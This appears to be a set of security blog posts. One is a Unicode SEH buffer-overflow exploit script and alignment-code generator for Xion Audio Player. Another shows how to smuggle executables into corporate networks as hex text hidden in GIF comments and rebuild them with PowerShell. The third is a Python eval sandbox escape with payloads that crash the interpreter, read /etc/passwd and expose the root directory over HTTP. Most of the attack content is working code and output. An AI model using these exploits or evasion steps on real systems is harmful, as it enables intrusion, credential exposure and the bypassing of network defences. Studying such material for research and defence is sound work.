Automated generation of code alignment code for Unicode buffer overflow exploitation

Update: Implemented an advanced version for mona.py.

Puh, I know, long title. So as I was going through my corelan training material again, I was trying to exploit the public Xion exploit that can be found on exploit-db (please read the exploit first). As I can’t cover all the basics in this blog posts, here just a short overview of the exploit:

  • Exploits Xion Audio Player version 1.0.125 when opening an m3u file
  • Extremely straight forward, write 5000 A’s to a file, change extension to .m3u, open with Xion player, boom!
  • It’s an SEH exploit. So we control one of the exception handlers. It’s Unicode, so if you use corelan’s mona, use things like !mona seh -cp unicode. Unicode exploits are a little bit tricky, you often get null bytes, the presentation of FX about Unicode exploiting helped a lot.

Ok, let’s assume you already did the SEH exploiting and got code execution. So if you want to play from this point, here’s the exploit so far (simply hits our garbage). All the steps starting from this script are explained in the video below (although you might need to know how to change the offset to SEH by injecting a cycling patter, because the .m3u path length matters):

import subprocess
overflow_length = 5000
offset = 237 #Attention: changes with path length of the m3u file!
seh_handler = "\x93\x47" #will be transformed to 0047201C and at that address there is a POP; POP; RET;. This means we can jump to seh_nextrecord and execute it. Set breakpoint on this SEH handler!
seh_nextrecord = "\x50\x6d" #Serves as a kind of "NOP" here
garbage = "B"
junk = "A"*offset+seh_nextrecord+seh_handler+garbage*(overflow_length-offset-len(seh_nextrecord)-len(seh_handler))

payload = junk
dbg = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
exploitable_exe = "C:\\Program Files\\r2 Studios\\Xion\\Xion.exe"
exploit_file = "C:\\testig101\\test\\theUnicode\\exploit.m3u"
file(exploit_file,"wb").write(payload)
subprocess.call([dbg,exploitable_exe,exploit_file])

So now we’re at the point where we want to run shellcode. Usual shellcodes can not be used in Unicode environments, therefore we need to use an encoder, for example the Alpha3 encoder. Now the thing with encoders is that they normally use a GetPC routine or a BufferRegister to locate themselves in memory. GetPC is not compatible with Unicode, so we have to use a BufferRegister. A BufferRegister means nothing else than writing the address of the location of the first byte of the shellcode into a register and telling the shellcode which register it is. To achieve this goal, we need to write an alignment code that is Unicode compliant itself.

Now we come to the core part of this post: Writing alignment code. How do we write the correct address into the register? So far this involved some manual work. We have to find Unicode compatible opcodes. We can look at the transformation tables in FX’s presentation, but for a lot of characters this means we inject “\x41” and it will be transformed to “\x41\x00”. So which opcodes of the x86 assembler language have null bytes in it? Even worse, for most of our injections the opcodes must have a null byte every second byte. Or at least we have to get rid of those zero bytes.

I checked on the metasm shell (included in the Metasploit framework under the tools folder) and found out that all ADD operations with 4 byte registers (ah, al, bh, bl, etc.) start with a zero byte:

metasm > add ah,bl
"\x00\xdc"

So because I’m a lazy guy and don’t want to do the manual work, I wrote a program that will write the alignment code for me and hopefully for everybody else in the future.

Here are the steps that have to be done if you want to use my script:

  1. Make sure the first four bytes of the BufferRegister are correct (not part of the script).
  2. Get some reliable values into EAX, ECX, EDX, EBX with as few null bytes in it as possible (not part of the script).
  3. Tell my script the value of the EAX, ECX, EDX, EBX registers when the debugger stops exactly at the position where the alignment code will start. Additionally tell the script the address of the start of the alignment code (the current EIP).
  4. Run the script. It uses a random “heuristic” (well, bruteforcing with random inputs). So far I always got the single best result (with this approach) when I run it at least 1 minute. An alignment code that is a little longer is normally found in a couple of seconds.
  5. Stop the script (Ctrl+C) when you waited long enough and think there will be no shorter result. Copy the best/shortest/last alignment code into the metasm shell to get opcodes in hex.
  6. Remove the null bytes from the alignment code (they get injected in the Unicode transformation).
  7. Inject the alignment code, add your produced Unicode shellcode, pwn!

The idea is to calculate the correct value where our shellcode lies. But if the shellcode is put directly after the alignment code, every additional instruction in the alignment code will increase our “target” address we want to have in our BufferRegister. This means we don’t know the location from the beginning, but have to calculate it. Until now the approach was to chose an address that is enough far away and then jump to that address at the end of the alignment code. This script finds better solutions. The script does nothing else than trying to sum up the different bytes of AH, AL, BH, BL etc. and try to find the correct value, always keeping track on how many instructions are already needed and adjusting the “target” address where the shellcode will live. So far the theory. Some more theory, the math modell behind:

written by floyd - floyd.ch
all rights reserved

https://www.floyd.ch
@floyd_ch

We are talking about a problem in GF(256). In other words the numbers are modulo 256. Or for the 
IT people: A byte that wraps around (0xFFFFFFFE + 0x00000002 = 0x00000001).

Let's first discuss a simple example with 8 inputs (a1..a8). We need the more general case, 
but so far 8 inputs is the maximum that makes sense. Although it doesn't make any
difference. If we solve the general case with (let's say) 16 Inputs we can
simply set the not needed inputs's to zero and they will be ignored in the model.
The script runs in the general case and can operate in all cases!

Inputs (values): a1, a2, ..., a8 mod 256
Inputs (starts): s1, s2 mod 256
Inputs (targets/goal): g1, g2 mod 256
Outputs: x1, x2, ..., x8, y1, y2, ..., y8 where these are natural numbers (including zero)!

Find (there might be no solution):
s1+a1*x1+a2*x2+a3*x3+a4*x4+a5*x5+a6*x6+a7*x7+a8*x8-((s2+2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)+3)/256) = g1 mod 256
s2+a1*y1+a2*y2+a3*y3+a4*y4+a5*y5+a6*y6+a7*y7+a8*y8-2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)-3 = g2 mod 256

Minimise (sum of outputs):
x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8

Example
{a1, a2, ... a8} = {9, 212, 0, 0, 32, 28, 50, 188}
{s1, s2} = {233, 212}
{g1, g2} = {253, 75}

Btw the +3 and -3 in the formula is because we have to get rid of the last zero byte, we do that by injecting
\x6d, which results in 00 6d 00 (serves as a "NOP"), meaning we need to add 3 to the address.

[Extra constraints!]
1. As we first set AH (or whatever higher byte is in start_is) to the correct value
AH has changed until we want to set AL. Therefore the instruction
add al, ah will NOT return the correct result, because we assume an old value
for the AH register! That's why we have a originals (a1...a8) and
modify them to a21, a22, a23, .. a28 (only for y1...y8, for the x values we're fine)
2. Additionally, the following instructions are not allowed (because it would be a lot more
complicated to calculate in advance the state of the register we are modifying):
add ah, ah
add al, al
Solved by overwriting if random generator produced something like that.
3. This program only works if you already managed to get the first
four bytes of the alignment address right (this program operates
only on the last four bytes!)

I would say that the script already works pretty well, although it is not yet tested with a lot of different situations. Enough talking, here is the script:

#written by floyd - floyd.ch
#all rights reserved
#
#https://www.floyd.ch
#@floyd_ch

#Inputs - later in mona read it from the breakpoint we're at
start_is = ['ah', 'al'] #Means: Our BufferRegister is chosen as aex
start = 0xE9D4 #Nothing else than the last four bytes of our BufferRegister
goal = 0xFD53 #Address of the first byte of the alignment code, but without
              #the setting up of the EAX,EBX,ECX,EDX registers!
              #In other words: the address where the first byte of the here
              #generated code is
eax=0x02cde9d4
ecx=0x0047201c
edx=0x7C9032BC
ebx=0x02CDE8F8
#End inputs

#Options:
MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS=0.25
#Idea of 0.25: We will add every fourth register to the sum.
#This means in average we will increase by 2 instructions every run of 
#randomise.
MAGIC_PROBABILITY_OF_RESETTING=0.04 #an average of about 40 instructions
MAGIC_MAX_PROBABILITY_OF_RESETTING=0.11 #an average of about 20 instructions
#Idea: This is a trade-off - we don't want
#to find no results by resetting to often (and never even
#trying an instruction length of e.g. 500 bytes). On the other
#hand we don't want to search in solutions with a lot of bytes
#when we already found a shorter solution. Therefore we will
#slightly increase it with time.
#End options - don't modify anything below here!

import pprint, time, random, copy
def main():
    originals = []
    ax = theX(eax)
    ah = higher(ax)
    al = lower(ax)
    
    bx = theX(ebx)
    bh = higher(bx)
    bl = lower(bx)
    
    cx = theX(ecx)
    ch = higher(cx)
    cl = lower(cx)
    
    dx = theX(edx)
    dh = higher(dx)
    dl = lower(dx)
    
    start_address = theX(start)
    s1 = higher(start_address)
    s2 = lower(start_address)
    
    goal_address = theX(goal)
    g1 = higher(goal_address)
    g2 = lower(goal_address)
    
    names = ['ah', 'al', 'bh', 'bl', 'ch', 'cl', 'dh', 'dl']
    originals = [ah, al, bh, bl, ch, cl, dh, dl]
    sanitiseZeros(originals, names)
    
    #a1, a2, a3, a4, a5, a6, a7, a8 = originals
    #x1, x2, x3, x4, x5, x6, x7, x8 = [0 for i in range(0,8)]
    #y1, y2, y3, y4, y5, y6, y7, y8 = [0 for i in range(0,8)]
    
    #xs = [x1, x2, x3, x4, x5, x6, x7, x8]
    #ys = [y1, y2, y3, y4, y5, y6, y7, y8]
    
    xs = [0 for i in range(0,len(originals))]
    ys = [0 for i in range(0,len(originals))]
    
    #[Extra constraint!] 1.
    #we have to modify the AH value, because it will change until
    #we reach the instruction where we modify AL
    originals2 = copy.copy(originals)
    originals2[names.index(start_is[0])] = g1 #it will be the target value
    
    best_result = 999999999
    number_of_tries = 0.0
    while True:
        #Hmm, we might have a problem to improve the heuristic (random right now)
        #if we don't put the Extra constraints into the formula
        randomise(xs)
        randomise(ys)
        
        #[Extra constraint!] 2.
        #not allowed: 
        #add al, al
        #add ah, ah
        xs[names.index(start_is[0])] = 0
        ys[names.index(start_is[1])] = 0
        
        tmp = check2(originals, originals2, [s1, s2], [g1, g2], xs, ys, best_result)
        if tmp > 0:
            best_result = tmp
            #we got a new result
            printNicely(names, start_is, xs, ys)
        #Slightly increases probability of resetting with time
        probability = MAGIC_PROBABILITY_OF_RESETTING+number_of_tries/(10**8)
        if probability < MAGIC_MAX_PROBABILITY_OF_RESETTING:
            number_of_tries += 1.0
        if random.random() <= probability:
            #print "Reset"
            xs = [0 for i in range(0,len(originals))]
            ys = [0 for i in range(0,len(originals))]
    

def sanitiseZeros(originals, names):
    for index, i in enumerate(originals):
        if i == 0:
            print """WARNING: Your %s register seems to be zero, for the heuristic it's much healthier
            if none is zero. Although it might still work, it might also not work or take longer.""" % names[index]
            del originals[index]
            del names[index]
            return sanitiseZeros(originals, names)


def randomise(values):
    for index, i in enumerate(values):
        if random.random() <= MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS:
            values[index] += 1

def check2(as1, as2, ss, gs, xs, ys, best_result):
    g1, g2 = gs
    s1, s2 = ss
    sum_of_instructions = sum(xs) + sum(ys) 
    if best_result > sum_of_instructions:
        res0 = s1
        res1 = s2
        for index, _ in enumerate(as1):
            res0 += as1[index]*xs[index] % 256
            res1 += as2[index]*ys[index] % 256
        res0 = res0 - ((s2+(2*sum_of_instructions)+3)/256) #+3 for the 6d at the end, which is 006d00 
        res1 = res1 - (2*sum_of_instructions+3) #+3 for the 6d at the end, which is 006d00 
        if g1 == res0 % 256 and g2 == res1 % 256:
            debug("###FOUND")
            debug("a11...a1?", hexlist(as1))
            debug("a21...a2?", hexlist(as2))
            debug("s1, s2", hexlist(ss))
            debug("g1...g2", hexlist(gs))
            debug("x1...x?", xs)
            debug("y1...y?", ys)
            debug("No of instructions:", sum_of_instructions)
            return sum_of_instructions
    return 0
        
#Old version of check that doesn't support variable as1/as2 lengths, but
#might just be easier to understand if somebody wants to understand this stuff
# def check(as1, as2, ss, gs, xs, ys, best_result):
#     g1, g2 = gs
#     s1, s2 = ss
#     a11, a12, a13, a14, a15, a16, a17, a18 = as1
#     a21, a22, a23, a24, a25, a26, a27, a28 = as2
#     x1, x2, x3, x4, x5, x6, x7, x8 = xs
#     y1, y2, y3, y4, y5, y6, y7, y8 = ys
#     
#     num_of_instr = x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8
#     
#     if best_result > num_of_instr:
#         if (s1+a11*x1+a12*x2+a13*x3+a14*x4+a15*x5+a16*x6+a17*x7+a18*x8-((s2+2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)+3)/256)) % 256 == g1 \
#         and (s2+a21*y1+a22*y2+a23*y3+a24*y4+a25*y5+a26*y6+a27*y7+a28*y8-2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8))-3 % 256 == g2:
#             debug("###FOUND")
#             debug("a11...a18", hexlist(as1))
#             debug("a21...a28", hexlist(as2))
#             debug("s1, s2", hexlist(ss))
#             debug("g1...g8", hexlist(gs))
#             debug("x1...x8", xs)
#             debug("y1...y8", ys)
#             debug("No of instructions:", num_of_instr)
#             return num_of_instr
#     return 0

def printNicely(names, start_is, xs, ys):
    #print names, start_is, xs, ys
    resulting_string = ""
    sum_instr = 0
    for index, x in enumerate(xs):
        for k in range(0, x):
            resulting_string += "add "+start_is[0]+","+names[index]+"; "
            sum_instr += 1
    for index, y in enumerate(ys):
        for k in range(y):
            resulting_string += "add "+start_is[1]+","+names[index]+"; "
            sum_instr += 1
    resulting_string += "add [ebp],ch;"
    sum_instr += 1
    result("Use the following instructions (%i long, paste into metasm shell/remove all zero bytes):\n"%sum_instr, resulting_string)

def hexlist(list):
    return [hex(i) for i in list]
    

def theX(num):
    res = (num>>16)<<16 ^ num
    #print hex(res)
    return res
    
def higher(num):
    res = num>>8
    #print hex(res)
    return res
    
def lower(num):
    res = ((num>>8)<<8) ^ num
    #print hex(res)
    return res
    
def result(*text):
    print "[RESULT] "+str(" ".join(str(i) for i in text))
    
def debug(*text):
    if False:
        print "[DEBUG] "+str(" ".join(str(i) for i in text))

main()

As I talked to Peter aka corelanc0d3r he liked the idea that we could implement it into mona, although there are a few things that should be changed/added. It is important that we get static and reliable addresses into EAX, ECX, EDX and EBX before we do the math. So in mona the first two steps from above should be integrated as well. Therefore mona should do the following:

  1. Check if EBP is a stackpointer, if yes go to 2. otherwise go to 3.
  2. Pop EBP into EAX: \x55\x6d\x58\6d
  3. Pop ESP into EBX: \x54\x6d\x5B\6d
  4. Find reliable stack pointers on the stack and pop different ones into EDX, ECX (and EAX if 2. was not executed)
  5. Do the math and suggest to user

In a lot of cases this procedure of checking EBP and find reliable stack pointers is probably not necessary. But to get higher reliability for the automated approach it should be done. As Peter pointed out, one of the registers could be filled with a timestamp or something. For now, if you use my script, check for these things manually.

Another good thing I have to point out about this script: We won’t need to jump to the shellcode and we don’t need to put garbage between the alignment code and the shellcode. The script/math model makes sure that the next instruction after the alignment code is exactly where our BufferRegister is pointing to (and where we can put our Unicode shellcode).

Now check out the video describing all the steps and how to use the script:

Go to vimeo to watch the video

Update: Implemented an advanced version for mona.py.

Hiding files in GIF comments

Firewall, IDS, IPS, Load Balancers, Proxies, Antivirus, MAC address filtering and no USB ports. A lot of companies are filtering the information/data that is getting into their network (and out of their network). But in the end the user wants to get information from the internet. Let’s face it: Text is information. So let’s use text to get a binary executable into the corporate network. While it’s relatively easy to convert text into binaries and back on Linux and Mac (thank you bash!), it was sometimes a pain in Windows until Powershell. As far as I know Powershell is available on all Windows 7 and newer machines.

This is not a new technique, it’s already in use, for example in the SET. I read a blogpost which explains exactly what we are doing here, I just wanted to try it myself and I changed the encoding from decimal to hex, which removes the necessity for a delimiter and makes the text data smaller in general. Additional I’ll show how to hide the information in a GIF image and how to extract it on a Powershell.

Let’s first convert our binary into text (hex encoding). So first prepare the text we want to put somewhere on the internet. Here is a small python one-liner that converts notepad.exe into the required format.

In Python on Windows:

.\python.exe -c "file('C:\\Users\\user\\Desktop\\notepad_hex.txt','wb').write(file('C:\\Windows\\notepad.exe','rb').read().encode('hex'))"

In Python on Unix:

python -c "file('/tmp/notepad_hex.txt','wb').write(file('/tmp/notepad.exe','rb').read().encode('hex'))"

If you open notepad_hex.txt now, you only see hexadecimal numbers:

4d5a9000030000…

That’s already the text version you can put on a website and you can access from your company network and your company desktop machine (eg. pastebin). If you can access the notepad_hex.txt on a web server directly, it’s probably better if you use the “save as” dialogue of your browser to store it (it’s quite a long hex string). As soon as your back in your company network, save the contents to a file. Let’s assume you saved it to C:\Users\user\Desktop\notepad_hex.txt

So let’s convert the text back to an executable in our Powershell. I just adopted the code from the blogpost:

[string]$hex = get-content -path C:\Users\user\Desktop\notepad_hex.txt
[Byte[]]$temp = $hex -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}
[System.IO.File]::WriteAllBytes("C:\Users\user\Desktop\notepad.exe", $temp)

You should have notepad.exe on your Desktop now. This will also work with other file formats, for example zip files, although much slower with increasing file size.

Of course there are other methods of smuggling data into the corporate network. For example if you prefer to put the text data into a picture, you can use ImageMagick (included in the Ubuntu repositories and Mac Ports) in a shell. So for example to put the hex data into a gif comment, use the following commands (first rename an image to black.gif):

python -c "file('/tmp/something_hex.txt','wb').write(file('/tmp/something.exe','rb').read().encode('hex'))"
hex=`cat /tmp/something_hex.txt`
convert -comment "$hex" black.gif black2.gif

Note that this method on the command line only works for small hex data. I got an “Argument list too long” error for notepad, so use this command instead if it is a big file:

convert -comment @/tmp/notepad_hex.txt black.gif notepad.gif

But how do we get the data out of the picture in our Powershell? Let’s have a look at the nice ASCII Art for the Comment Extension in the GIF89a format spec:

    c. Syntax.

    7 6 5 4 3 2 1 0        Field Name                    Type
   +---------------+
0  |               |       Extension Introducer          Byte
   +---------------+
1  |               |       Comment Label                 Byte
   +---------------+

   +===============+
   |               |
N  |               |       Comment Data                  Data Sub-blocks
   |               |
   +===============+

   +---------------+
0  |               |       Block Terminator              Byte
   +---------------+

          i) Extension Introducer - Identifies the beginning of an extension
          block. This field contains the fixed value 0x21.

          ii) Comment Label - Identifies the block as a Comment Extension.
          This field contains the fixed value 0xFE.

          iii) Comment Data - Sequence of sub-blocks, each of size at most
          255 bytes and at least 1 byte, with the size in a byte preceding
          the data.  The end of the sequence is marked by the Block
          Terminator.

          iv) Block Terminator - This zero-length data block marks the end of
          the Comment Extension.

So it basically says we have to look for 0x21FE and read the number of bytes specified in the first byte. Then read again the next byte to see how many bytes we have to read and so on. Let’s do that in a Powershell:

[string]$picture = get-content -path C:\Users\user\Desktop\notepad.gif
[string]$delimiter = [Convert]::ToChar(0x21)+[Convert]::ToChar(0xFE)
[string[]]$commentarray = $picture -split $delimiter,2
[string]$junk = $commentarray[1]
[string]$hex = ""
while($true){
	[int]$length = [int][char]$junk.substring(0,1)
	$hex = $hex + $junk.substring(1,$length)
	$junk = $junk.substring($length+1)
	if($length -lt 255){
		break
	}
}
[Byte[]]$temp = $hex -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}
[System.IO.File]::WriteAllBytes("C:\Users\user\Desktop\notepad.exe", $temp)

I feel like Powershell and me could get good friends. If you want to try it yourself, save the following notepad.gif on your Desktop, change the username in the paths of the code above and copy/paste it into a Powershell.

Exploiting Python’s Eval

For those of you just interested in the exploiting part, scroll down to “Exploiting“.

I’m reading the following book right now:

Programming Python, Fourth Edition, by Mark Lutz (O’Reilly). Copyright 2011 Mark Lutz, 978-0-596-15810-1

Example 1-22 on page 38/39 reads as following:

me$ cd PP4E/Preview/
me$ cat peopleinteract_update.py
# interactive updates
import shelve
from person import Person
fieldnames = ('name', 'age', 'job', 'pay')

db = shelve.open('class-shelve')
while True:
    key = input('\nKey? => ')
    if not key: break
    if key in db:
        record = db[key]                      # update existing record
    else:                                     # or make/store new rec
        record = Person(name='?', age='?')    # eval: quote strings
    for field in fieldnames:
        currval = getattr(record, field)
        newtext = input('\t[%s]=%s\n\t\tnew?=>' % (field, currval))
        if newtext:
            setattr(record, field, eval(newtext))
    db[key] = record
db.close()

Of course I saw that “eval”, so I immediately stopped reading the book and started reading about how I could exploit this little Python program. The book doesn’t mention that this example could be a security problem, but it looks like they wanted to add a comment, because on page 49 it reads:

As mentioned previously, this is potentially dangerous if someone sneaks some malicious cod into our shelve, but we’ll finesse such concerns for now.

In my opinion it would be better to show a programmer how easy it is to specify a whitelist of characters (eg. say a-zA-Z0-9 and the single quote). From a security perspective, incorrect or insufficient input filtering is very dangerous. Although most of the time not the root cause, input filtering can help to prevent buffer overflows, XSS, SQL injection and most other injections. Whitelisting in Python would be done as following:

import string
whitelist = string.ascii_letters + string.digits + "' "
newtext = ''.join(c for c in newtext if c in whitelist)

Of course this whitelist would not cover Unicode characters. So the filter could be changed to a blacklist filter, which allows all Unicode characters, which should still be pretty safe (although blacklists are bad practice):

import string
whitelist = string.ascii_letters + string.digits + "' "
newtext = ''.join(c for c in newtext if c in whitelist or ord(c) > 127)

Of course this is just a workaround, the proper solution would be not to use the eval function. Instead all the input should be treated as strings and only fields with integers (age and pay) should be parsed to integers. The following code is the proper solution for the above example:

me$ cd PP4E/Preview/
me$ cat peopleinteract_update.py
# interactive updates
import shelve
from person import Person
fieldnames = ('name', 'age', 'job', 'pay')
numerical_fieldnames = ('age', 'pay')

db = shelve.open('class-shelve')
while True:
    key = raw_input('\nKey? => ')
    if not key: break
    if key in db:
        record = db[key]                      # update existing record
    else:                                     # or make/store new rec
        record = Person(name='?', age='?')
    for field in fieldnames:
        currval = getattr(record, field)
        newtext = raw_input('\t[%s]=%s\n\t\tnew?=>' % (field, currval))
        newtext = int(newtext) if field in numerical_fieldnames else newtext
        if newtext:
            setattr(record, field, newtext)
    db[key] = record
db.close()

Exploiting

So let’s talk about exploiting the first example. I soon found out that the example would be very easy to exploit. For example the exit function is interpreted by eval and the program quits:

me$ python3.3 peopleinteract_update.py

Key? => tom
	[name]=56
		new?=>exit()
me$

So I read an article about the problem. I found this little code example, which can be used to execute something on your system (Unix example):

$ python3.3 peopleinteract_update.py

Key? => tom
	[name]=56
		new?=>__import__('os').system('echo hello, I am a command execution')
hello, I am a command execution
	[age]=mgr
		new?=>

As you see, the echo command is executed and printed on the next line. I told myself that was to easy and I wanted to exploit the program in harder circumstances. As described in that article, some people try to “secure” an eval call by overwriting the __builtins__ of Python. So let’s assume the line with eval in the example 1-22 looks as following:

setattr(record, field, eval(newtext, {'__builtins__':{}}))

To clear the builtins is considered a “security measure” for a lot of people, but as described in the article above it just makes it harder to exploit, not impossible. So I wanted to try that segmentation fault technique in the article on the example. It worked well for Python 2.7:

$ python
Python 2.7.3 (default, Apr 19 2012, 00:55:09)
[GCC 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2335.15.00)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> s = """
... (lambda fc=(
...     lambda n: [
...         c for c in
...             ().__class__.__bases__[0].__subclasses__()
...             if c.__name__ == n
...         ][0]
...     ):
...     fc("function")(
...         fc("code")(
...             0,0,0,0,"KABOOM",(),(),(),"","",0,""
...         ),{}
...     )()
... )()
... """
>>> eval(s, {'__builtins__':{}})
Segmentation fault: 11
me$

But they changed the constructor for Python 3 for the code object. So if you run the same code on Python 3.3 it will output that it needs 13 arguments:

$ python3.3
Python 3.3.0rc2 (default, Sep  9 2012, 04:29:34)
[GCC 4.2.1 Compatible Apple Clang 3.1 (tags/Apple/clang-318.0.58)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> #same s as before
...
>>> eval(s, {'__builtins__':{}})
Traceback (most recent call last):
  File "", line 1, in
  File "", line 3, in
  File "", line 11, in
TypeError: code() takes at least 13 arguments (12 given)
>>>

So because the book is about Python 3, we have to change the arguments for the code object constructor. But which arguments does it take? To find that out I started a Python 3 console and typed in the following:

>>> def foo(): pass
...
>>> help(type(foo.__code__))

We get a nice description of the constructor (__init__ method) of the code object and the message that this isn’t for the faint of heart. Fine for me. We get the following argument description for the constructor:

code(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring,
 |        constants, names, varnames, filename, name, firstlineno,
 |        lnotab[, freevars[, cellvars]])

There is no “kwonlyargcount” for Python 2.7, so with an additional 0 in the argument list and specifying two literals as “bytes” instead of “strings”, we get a Python 3 segmentation fault:

s = """
(lambda fc=(
    lambda n: [
        c for c in
            ().__class__.__bases__[0].__subclasses__()
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(
            0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""
        ),{}
    )()
)()
"""
eval(s, {'__builtins__':{}})

Now of course we want to feed it to the example program. So removing the new lines and replacing the three double quotes with one single quote we get:

s = '(lambda fc=( lambda n: [ c for c in  ().__class__.__bases__[0].__subclasses__()  if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()'
eval(s, {'__builtins__':{}})

Ok, those two lines still work fine on the interactive Python 3 shell (and by removing one of the first 0 arguments for the code init method it will also work in Python 2.7). Can we exploit the test application now? Yes we can:

me$ python3.3 peopleinteract_update.py

Key? => abc
	[name]=?
		new?=>(lambda fc=( lambda n: [ c for c in  ().__class__.__bases__[0].__subclasses__()  if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()
Segmentation fault: 11
me$

Ok, seg faulting is fine, but what about executing real code? For that we have to go a little bit back. First, let’s try again in Python 2.7 with the cool trick described in an article on reddit. If we run the following code in a python interactive interpreter, it will show us the help page (of the help command itself):

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['help'](__builtins__['help'])
)()
"""
eval(s, {'__builtins__':{}})

So let’s see the builtins we get back with this method:

>>> a = [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__.keys()>>> a.sort()
>>> a
['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']

For example we can now print something:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
)()
"""
eval(s, {'__builtins__':{}})

We can also exit the interpreter form within the eval:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['exit']()
)()
"""
eval(s, {'__builtins__':{}})

We can also delay the answer of the interpreter (takes about 10 seconds on my machine):

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['sum'](__builtins__['xrange'](-999999999,99999999))
)()
"""
eval(s, {'__builtins__':{}})

Of course if you add some more 9s to those numbers, you can DoS the interpreter.

But if we try to read a file, the restricted mode gets hit on my machine. It seems the restricted mode is “entered when the builtins in main_dict are not the same as the interpreter’s builtins”. Here’s the corresponding code:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['file']('/etc/passwd').read())
)()
"""
eval(s, {'__builtins__':{}})

The console answers with:

Traceback (most recent call last):
  File "", line 1, in
  File "", line 2, in
  File "", line 3, in
IOError: file() constructor not accessible in restricted mode

Hmm, ok. Strange, because we can execute commands on the system:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['__import__']('os').system('cat /etc/passwd'))
)()
"""
eval(s, {'__builtins__':{}})

So I don’t really care if I can read files on the system, I would simply execute a reverse shell if this would be an exploitable web service. My next try was the subprocess module, but no luck:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
__builtins__['print'](__builtins__['__import__']('subprocess').Popen('cat /etc/passwd', shell=True))
)()
"""
eval(s, {'__builtins__':{}})
Traceback (most recent call last):
File "", line 1, in
File "", line 2, in
File "", line 3, in
RuntimeError: cannot unmarshal code objects in restricted execution mode

Ok, so no subprocesses and no reading of files. Let’s simply do some cool stuff with the system module, like showing /etc/passwd above. Let’s start an HTTP Server which serves a directory listing of the root directory on port 8000:

s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
__builtins__['print'](__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
)()
"""
eval(s, {'__builtins__':{}})

I guess we’re pretty clear that from this point on we would have control over the machine, which is running the eval command. Here are the payloads (in several different versions) as one liners for Python 2.7. The file, open and fileinput payload fails because of the IOError of the restricted mode when the builtins are different, os.popen fails with a permission denied for me. The rest works on my machine:

